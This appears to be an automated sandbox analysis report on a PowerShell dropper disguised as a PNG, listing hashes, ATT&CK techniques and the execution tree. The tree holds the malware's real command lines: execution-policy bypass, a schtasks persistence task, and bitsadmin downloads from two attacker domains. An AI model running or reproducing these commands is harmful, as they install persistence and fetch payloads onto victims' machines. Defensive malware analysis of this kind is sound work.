e20d63d82415c54f408d750f77b1442b4540e1e7eca70cc5e77fc06a093a1eec

General

Target

WRQDouwL.png.ps1
Size

304KB
MD5

803d84838415f3c36742821f70203a8f
SHA1

e3b4bc28676f9f1c2c71fff706d240e9557df75e
SHA256

e20d63d82415c54f408d750f77b1442b4540e1e7eca70cc5e77fc06a093a1eec
SHA512

e083ed91c0eb5316d12ba090f2c14ed8a01075ebbb25a47f1f30ef56bf9877556aebb9e12ea0d39ef7ff5fcfd98e43c6c4fdb828936264e5abe75f2620277000
SSDEEP

1536:xoXGg/lCHSnPiCqoUZRCHJt50IRNGTRwOs3iFXO57fEPmjwl3Fo5+w5vKBx9SG0W:fmmp

Score

10^/10

dropper execution

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bitsadmin.exebitsadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3468	2044	bitsadmin.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1204	2044	bitsadmin.exe	87

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exe

pid	Process
3468	bitsadmin.exe
1204	bitsadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.EXE

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wscript.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
4988	powershell.exe
3968	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
3392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
4988	powershell.exe
4988	powershell.exe
3968	powershell.exe
3968	powershell.exe
3968	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

powershell.exewscript.EXEpowershell.exe

description	pid	Process	procid_target
PID 4988 wrote to memory of 816	4988	powershell.exe	84
PID 4988 wrote to memory of 816	4988	powershell.exe	84
PID 4988 wrote to memory of 3392	4988	powershell.exe	85
PID 4988 wrote to memory of 3392	4988	powershell.exe	85
PID 892 wrote to memory of 3968	892	wscript.EXE	105
PID 892 wrote to memory of 3968	892	wscript.EXE	105
PID 3968 wrote to memory of 2176	3968	powershell.exe	108
PID 3968 wrote to memory of 2176	3968	powershell.exe	108
PID 3968 wrote to memory of 4720	3968	powershell.exe	111
PID 3968 wrote to memory of 4720	3968	powershell.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WRQDouwL.png.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:816
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /F /create /sc minute /mo 4 /TN "S0vOpSFCZlK" /ST 07:00 /TR "wscript /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\vOpSFCZlK\XAwvfVMl.rock"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3392

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\vOpSFCZlK\XAwvfVMl.rock
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file XAwvfVMl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:2176
- - C:\Windows\system32\bitsadmin.exe
    "C:\Windows\system32\bitsadmin.exe" /reset
    3⤵
    PID:4720

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer uKCeDl /priority FOREGROUND "https://yjtyhm.eu/topic//0fd09e229b09a55e26856f23dcf78472.html" C:\users\Admin\AppData\Roaming\vOpSFCZlK\0_winlogon.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3468

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer GxOwMn /priority FOREGROUND "https://nmhholiut.eu/topic//0fd09e229b09a55e26856f23dcf78472.html" C:\users\Admin\AppData\Roaming\vOpSFCZlK\1_winlogon.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:1204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4aaea8e990963328115bd59dee2bcda8

SHA1
2d7eed0a0a898811d6a149a4545ab3732477c01a

SHA256
d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc

SHA512
de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sn2yc3fp.um1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\users\Admin\AppData\Roaming\vOpSFCZlK\XAwvfVMl.ps1

Filesize
2KB

MD5
6d22b963b933205f9ff16a8518fd7d09

SHA1
10edd260dd52819151119e75c8e4d46e75a32949

SHA256
0be7b6c78943456988e03e70870bec43b3e808a799b7e622dbcdd28999455ed5

SHA512
071d91ea634f9cf39cf85840d48a3c9a063c3ce23e4c1bfd040746452f1ab8dca76daac49a62aa3ec082251a764b889f4ad8fabacdd36cb411593e6edebd559b

Download Submit
C:\users\Admin\AppData\Roaming\vOpSFCZlK\main.sh

Filesize
196KB

MD5
d4f06b258da41c8260fe07e2bc280953

SHA1
046a98fa4b8e4b44914884c1525c2c787c98cfa4

SHA256
b89c2c4c38917239929a94d79f86076f61dde3029fb514fdc7944d7b0114a455

SHA512
3bc6231d0d5aebad5f3dc45ff6c9b9391ebab51ea004acadd4b9cea96fab91a2274a04d65ca76c431048303cb2405178fcfb989db7bbac95a10ccbf42c4ce660

Download Submit
C:\users\Admin\AppData\Roaming\vOpSFCZlK\sleep.sh

Filesize
1KB

MD5
a42520d036314591d61ecb810833a0f4

SHA1
f45f63c60562aadd137fe5f23d37ec5d8a1c54da

SHA256
f2d2cc6bb0b77ef031d0508acb99b4c12b95ff3eff76d33aeb40b8c8695146ea

SHA512
35a13ed9c17b1659f9c53ce4f53048f3dcf6e790a1b74bdcf174d3a625ad9db2e04da491f74d735bfabec54c2c7981c73ac516fe5612995836c179f792e73a9b

Download Submit
\??\c:\users\Admin\AppData\Roaming\vOpSFCZlK\XAwvfVMl.rock

Filesize
930B

MD5
c4a3c0d1b98d69d3172259cdb5ac539f

SHA1
62403e500a90ca08210445310423c5889cf04acc

SHA256
b7221f4d2a2d828ae14d1ad8ec9bec78e6d9c096d3af89cea6aaaa8b9faa4667

SHA512
0e266694d90d14683486cde0032037cb8899078d291f8cd415cf7590d1b25eb1a1c6714de74445f5e7e6a728e5e69eb8b54e9d26351431058da3f7b06b26a01e

Download Submit
memory/3968-36-0x0000028528160000-0x0000028528688000-memory.dmp

Filesize
5.2MB

Download
memory/4988-11-0x00007FFE236D0000-0x00007FFE24191000-memory.dmp

Filesize
10.8MB

Download
memory/4988-21-0x00007FFE236D0000-0x00007FFE24191000-memory.dmp

Filesize
10.8MB

Download
memory/4988-18-0x00007FFE236D0000-0x00007FFE24191000-memory.dmp

Filesize
10.8MB

Download
memory/4988-13-0x00007FFE236D0000-0x00007FFE24191000-memory.dmp

Filesize
10.8MB

Download
memory/4988-12-0x00007FFE236D0000-0x00007FFE24191000-memory.dmp

Filesize
10.8MB

Download
memory/4988-0-0x00007FFE236D3000-0x00007FFE236D5000-memory.dmp

Filesize
8KB

Download
memory/4988-10-0x000001D14BB60000-0x000001D14BB82000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads